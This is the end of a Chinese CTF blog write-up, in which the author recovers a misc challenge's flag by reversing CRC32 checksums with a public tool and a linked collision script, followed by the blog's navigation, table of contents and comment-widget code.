<p>很不巧本人还不会用python写脚本爆破，上网找了个CRC32爆破工具<br><a target="_blank" rel="noopener" href="https://github.com/theonlypwner/crc32">https://github.com/theonlypwner/crc32</a><br>使用方法：<code>python crc32.py reverse 0x（crc32密文）</code><br>这个工具可以解4字节和6字节的字符串，然而不幸的事情又发生了，这玩意儿里面还有一个3字节和一个5字节，网上找了个别人的代码<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/WFC1006848997/article/details/110295708">CRC32碰撞脚本（1-5字节）</a><br>5字节有点慢，不过能凑合着用。</p>
<p>最后一个个解出来拼在一起，就是flag。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
              <a href="/tags/web/" rel="tag"><i class="fa fa-tag"></i> web</a>
              <a href="/tags/misc/" rel="tag"><i class="fa fa-tag"></i> misc</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/01/18/xss%E5%AD%A6%E4%B9%A0%E5%81%9A%E9%A2%98wp/" rel="prev" title="xss学习做题wp">
      <i class="fa fa-chevron-left"></i> xss学习做题wp
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/01/27/ROIS2023%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="next" title="ROIS2023冬令营第三周学习记录">
      ROIS2023冬令营第三周学习记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=478507889&auto=1&height=66"></iframe>

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#web"><span class="nav-number">1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-XssTest"><span class="nav-number">1.1.</span> <span class="nav-text">[Week2]XssTest</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2023-x2F-01-x2F-26-%E5%AD%A6%E4%B9%A0-amp-amp-%E5%B0%9D%E8%AF%95"><span class="nav-number">1.1.1.</span> <span class="nav-text">2023&#x2F;01&#x2F;26 学习&amp;&amp;尝试</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-ez-php-source"><span class="nav-number">1.2.</span> <span class="nav-text">[Week2]ez_php_source</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2023-x2F-01-x2F-27-%E5%AD%A6%E4%B9%A0-amp-amp-%E5%B0%9D%E8%AF%95"><span class="nav-number">1.2.1.</span> <span class="nav-text">2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-very-easy-sql"><span class="nav-number">1.3.</span> <span class="nav-text">[Week2]very_easy_sql</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2023-x2F-01-x2F-27-%E5%AD%A6%E4%B9%A0-amp-amp-%E5%B0%9D%E8%AF%95-1"><span class="nav-number">1.3.1.</span> <span class="nav-text">2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-double-cmd-amp-amp-Week2-double-cmd-plus"><span class="nav-number">1.4.</span> <span class="nav-text">[Week2]double_cmd &amp;&amp;[Week2]double_cmd_plus</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2023-x2F-01-x2F-26-%E5%AD%A6%E4%B9%A0-amp-amp-%E5%B0%9D%E8%AF%95-1"><span class="nav-number">1.4.1.</span> <span class="nav-text">2023&#x2F;01&#x2F;26 学习&amp;&amp;尝试</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2023-x2F-01-x2F-27-%E5%AD%A6%E4%B9%A0-amp-amp-%E5%B0%9D%E8%AF%95-2"><span class="nav-number">1.4.2.</span> <span class="nav-text">2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Misc"><span class="nav-number">2.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-%E5%85%AB%E9%87%8D%E7%A5%9E%E5%AD%90%E7%9A%84%E5%B0%BE%E5%B7%B4"><span class="nav-number">2.1.</span> <span class="nav-text">[Week2]八重神子的尾巴</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-%E6%89%AB%E9%9B%B7"><span class="nav-number">2.2.</span> <span class="nav-text">[Week2]扫雷</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-%E7%88%B1%E9%97%A8%EF%BC%81"><span class="nav-number">2.3.</span> <span class="nav-text">[Week2]爱门！</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-%E7%9C%9F%E7%9A%84%E5%8A%A0%E5%AF%86%E4%BA%86%E5%90%97%EF%BC%9F"><span class="nav-number">2.4.</span> <span class="nav-text">[Week2]真的加密了吗？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-guess"><span class="nav-number">2.5.</span> <span class="nav-text">[Week2]guess</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Week2-%E9%80%8F%E8%A7%86"><span class="nav-number">2.6.</span> <span class="nav-text">[Week2]透视?</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="林涂"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">林涂</p>
  <div class="site-description" itemprop="description">学习ing</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">林涂</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'YVmWHQrHLOAW7ewgX1jprtQl-gzGzoHsz',
      appKey     : 'dY6y287UlOydRGZnN74I8XyY',
      placeholder: "输入你的评论\\n昵称为必填项目",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '3' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
